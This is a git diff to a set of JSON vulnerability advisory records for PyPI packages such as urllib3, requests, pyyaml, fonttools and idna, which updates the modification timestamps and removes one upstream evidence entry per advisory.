"ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2018-25091.json b/advisories/BREW-vs-preview-CVE-2018-25091.json index 0636bffc4c..6e859b5d6b 100644 --- a/advisories/BREW-vs-preview-CVE-2018-25091.json +++ b/advisories/BREW-vs-preview-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2018-25091", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2019-11236.json b/advisories/BREW-vs-preview-CVE-2019-11236.json index 515a280cb4..d0cac0cb3f 100644 --- a/advisories/BREW-vs-preview-CVE-2019-11236.json +++ b/advisories/BREW-vs-preview-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2019-11236", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2019-11324.json b/advisories/BREW-vs-preview-CVE-2019-11324.json index 94049f66c6..3669f667da 100644 --- a/advisories/BREW-vs-preview-CVE-2019-11324.json +++ b/advisories/BREW-vs-preview-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2019-11324", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2019-20477.json b/advisories/BREW-vs-preview-CVE-2019-20477.json index 33ae61da22..555153aaa4 100644 --- a/advisories/BREW-vs-preview-CVE-2019-20477.json +++ b/advisories/BREW-vs-preview-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2019-20477", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2020-14343.json b/advisories/BREW-vs-preview-CVE-2020-14343.json index 77bc2116e8..dd90fa72cd 100644 --- a/advisories/BREW-vs-preview-CVE-2020-14343.json +++ b/advisories/BREW-vs-preview-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2020-14343", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2020-1747.json b/advisories/BREW-vs-preview-CVE-2020-1747.json index cfb6610318..f1986d5cff 100644 --- a/advisories/BREW-vs-preview-CVE-2020-1747.json +++ b/advisories/BREW-vs-preview-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2020-1747", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2020-26137.json b/advisories/BREW-vs-preview-CVE-2020-26137.json index ae66b71d59..98abb76ab8 100644 --- a/advisories/BREW-vs-preview-CVE-2020-26137.json +++ b/advisories/BREW-vs-preview-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2020-26137", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2020-7212.json b/advisories/BREW-vs-preview-CVE-2020-7212.json index d36998f670..1d4d636fdc 100644 --- a/advisories/BREW-vs-preview-CVE-2020-7212.json +++ b/advisories/BREW-vs-preview-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2020-7212", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2021-28363.json b/advisories/BREW-vs-preview-CVE-2021-28363.json index a0715d0095..638eea3e4d 100644 --- a/advisories/BREW-vs-preview-CVE-2021-28363.json +++ b/advisories/BREW-vs-preview-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2021-28363", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2021-33503.json b/advisories/BREW-vs-preview-CVE-2021-33503.json index 8a3cf1df94..2d00c65a0f 100644 --- a/advisories/BREW-vs-preview-CVE-2021-33503.json +++ b/advisories/BREW-vs-preview-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2021-33503", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2023-32681.json b/advisories/BREW-vs-preview-CVE-2023-32681.json index 6738ffb7b7..e7f0cada2e 100644 --- a/advisories/BREW-vs-preview-CVE-2023-32681.json +++ b/advisories/BREW-vs-preview-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2023-32681", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2023-43804.json b/advisories/BREW-vs-preview-CVE-2023-43804.json index b0347f6ffb..942353ab26 100644 --- a/advisories/BREW-vs-preview-CVE-2023-43804.json +++ b/advisories/BREW-vs-preview-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2023-43804", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2023-45139.json b/advisories/BREW-vs-preview-CVE-2023-45139.json index f6bb831ff1..6fc35b9024 100644 --- a/advisories/BREW-vs-preview-CVE-2023-45139.json +++ b/advisories/BREW-vs-preview-CVE-2023-45139.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2023-45139", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-6673-4983-2vx5", "CVE-2023-45139", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fonttools", - "subject_version": "4.62.1", - "key": "pkg:pypi/fonttools@4.62.1", - "resource": "fonttools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2023-45803.json b/advisories/BREW-vs-preview-CVE-2023-45803.json index 35de7d201b..b7c0f32877 100644 --- a/advisories/BREW-vs-preview-CVE-2023-45803.json +++ b/advisories/BREW-vs-preview-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2023-45803", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2024-35195.json b/advisories/BREW-vs-preview-CVE-2024-35195.json index 12acb9a548..5537acd588 100644 --- a/advisories/BREW-vs-preview-CVE-2024-35195.json +++ b/advisories/BREW-vs-preview-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2024-35195", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2024-3651.json b/advisories/BREW-vs-preview-CVE-2024-3651.json index de24619b7c..d174887627 100644 --- a/advisories/BREW-vs-preview-CVE-2024-3651.json +++ b/advisories/BREW-vs-preview-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2024-3651", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.11", - "key": "pkg:pypi/idna@3.11", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2024-37891.json b/advisories/BREW-vs-preview-CVE-2024-37891.json index b31c57f74c..a4305c3312 100644 --- a/advisories/BREW-vs-preview-CVE-2024-37891.json +++ b/advisories/BREW-vs-preview-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2024-37891", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2024-47081.json b/advisories/BREW-vs-preview-CVE-2024-47081.json index dfcd811bf1..80d1e70bd2 100644 --- a/advisories/BREW-vs-preview-CVE-2024-47081.json +++ b/advisories/BREW-vs-preview-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2024-47081", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2025-50181.json b/advisories/BREW-vs-preview-CVE-2025-50181.json index 19763c9252..b2fb15948a 100644 --- a/advisories/BREW-vs-preview-CVE-2025-50181.json +++ b/advisories/BREW-vs-preview-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2025-50181", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2025-50182.json b/advisories/BREW-vs-preview-CVE-2025-50182.json index a23fef5d81..3407915e45 100644 --- a/advisories/BREW-vs-preview-CVE-2025-50182.json +++ b/advisories/BREW-vs-preview-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2025-50182", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2025-66034.json b/advisories/BREW-vs-preview-CVE-2025-66034.json index 10319d697c..57dff4cfe9 100644 --- a/advisories/BREW-vs-preview-CVE-2025-66034.json +++ b/advisories/BREW-vs-preview-CVE-2025-66034.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2025-66034", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-768j-98cg-p3fv", "CVE-2025-66034", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fonttools", - "subject_version": "4.62.1", - "key": "pkg:pypi/fonttools@4.62.1", - "resource": "fonttools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2025-66418.json b/advisories/BREW-vs-preview-CVE-2025-66418.json index ab472e1c05..557373dac2 100644 --- a/advisories/BREW-vs-preview-CVE-2025-66418.json +++ b/advisories/BREW-vs-preview-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2025-66418", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2025-66471.json b/advisories/BREW-vs-preview-CVE-2025-66471.json index b57baa0f70..5ffbadd657 100644 --- a/advisories/BREW-vs-preview-CVE-2025-66471.json +++ b/advisories/BREW-vs-preview-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2025-66471", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2026-21441.json b/advisories/BREW-vs-preview-CVE-2026-21441.json index cb55994e0a..4f3aa665fa 100644 --- a/advisories/BREW-vs-preview-CVE-2026-21441.json +++ b/advisories/BREW-vs-preview-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2026-21441", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2026-25645.json b/advisories/BREW-vs-preview-CVE-2026-25645.json index 0646ecf971..24bcfb8413 100644 --- a/advisories/BREW-vs-preview-CVE-2026-25645.json +++ b/advisories/BREW-vs-preview-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2026-25645", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2026-44431.json b/advisories/BREW-vs-preview-CVE-2026-44431.json index 60e61d6295..bf186b16d5 100644 --- a/advisories/BREW-vs-preview-CVE-2026-44431.json +++ b/advisories/BREW-vs-preview-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2026-44431", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2026-44432.json b/advisories/BREW-vs-preview-CVE-2026-44432.json index 7e428971ed..f7c1897ff4 100644 --- a/advisories/BREW-vs-preview-CVE-2026-44432.json +++ b/advisories/BREW-vs-preview-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2026-44432", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2026-45409.json b/advisories/BREW-vs-preview-CVE-2026-45409.json index 30958aa4e7..b24faef421 100644 --- a/advisories/BREW-vs-preview-CVE-2026-45409.json +++ b/advisories/BREW-vs-preview-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2026-45409", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.11", - "key": "pkg:pypi/idna@3.11", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI",